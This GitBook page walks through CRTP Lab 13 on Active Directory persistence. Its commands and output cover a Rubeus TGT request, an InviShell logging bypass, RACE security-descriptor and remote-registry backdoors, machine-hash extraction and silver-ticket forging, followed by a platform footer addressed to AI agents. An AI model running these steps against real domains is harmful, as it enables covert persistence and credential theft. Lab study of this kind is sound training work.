> For the complete documentation index, see [llms.txt](https://playbook.sidthoviti.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://playbook.sidthoviti.com/active-directory-pentest/persistence/using-acls/security-descriptors/crtp-lab-13.md). # CRTP Lab 13 ## **Task 1** Modify security descriptors on dcorp-dc to get access using PowerShell remoting and WMI without requiring administrator access. Open elevated DA cmd: {% code overflow="wrap" %} ```powershell #ArgSplit asktgt #Open DA cmd: C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt ``` {% endcode %} After we get the shell as DA, run InviShell and import RACE ```powershell #InviShell C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat #InviShell C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat # Import RACE . C:\AD\Tools\RACE.ps1 ``` Next, we try to provide student the same permissions as Builtin Administrator (BA) on root\cimv2 WMI namespace) {% code overflow="wrap" %} ```powershell Set-RemoteWMI -SamAccountName student372 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose ``` {% endcode %} We have modified Security Descriptors and hence we can execute WMI queries as student without Administrative cmd. ```powershell gwmi -class win32_operatingsystem -ComputerName dcorp-dc SystemDirectory : C:\Windows\system32 Organization : BuildNumber : 20348 RegisteredUser : Windows User SerialNumber : 00454-30000-00000-AA745 Version : 10.0.20348 ``` ## Task 2 Retrieve machine account hash from dcorp-dc without using administrator access and use that to execute a Silver Ticket attack to get code execution with WMI. Before we retrieve machine account hash, we need to modify permissions on DC. {% code overflow="wrap" %} ```powershell # Spawn a new Powershell. powershell . C:\AD\Tools\RACE.ps1 Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Trustee student372 -Verbose ComputerName BackdoorTrustee ------------ --------------- dcorp-dc.dollarcorp.moneycorp.local student372 ``` {% endcode %} Since student is added as backdoor, we can retrieve hash as student372. ```powershell # Spawn new powershell . C:\AD\Tools\RACE.ps1 Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose ComputerName MachineAccountHash ------------ ------------------ dcorp-dc 0a05dd30b8f44589c534dcd951c765b6 ``` Using the machine hash, we can use Silver Ticket attack on Host and RPCSS services. {% code overflow="wrap" %} ```powershell # Host C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt # RPCSS C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:0a05dd30b8f44589c534dcd951c765b6 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt ``` {% endcode %} PS Remoting: {% code overflow="wrap" %} ``` PSRemoting: C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat C:\AD\Tools>set COR_ENABLE_PROFILING=1 C:\AD\Tools>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db} C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f The operation completed successfully. C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f The operation completed successfully. C:\AD\Tools>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f The operation completed successfully. C:\AD\Tools>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows PS C:\AD\Tools> . C:\AD\Tools\RACE.ps1 PS C:\AD\Tools> Set-RemotePSRemoting -SamAccountName student372 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose [dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-dc.dollarcorp.moneycorp.local failed with the following error message: The I/O operation has been aborted because of either a thread exit or an application request. For more information, see the about_Remote_Troubleshooting Help topic. + CategoryInfo : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [], PSRemotingTransportException + FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken PS C:\AD\Tools> ``` {% endcode %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/persistence/using-acls/security-descriptors/crtp-lab-13.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.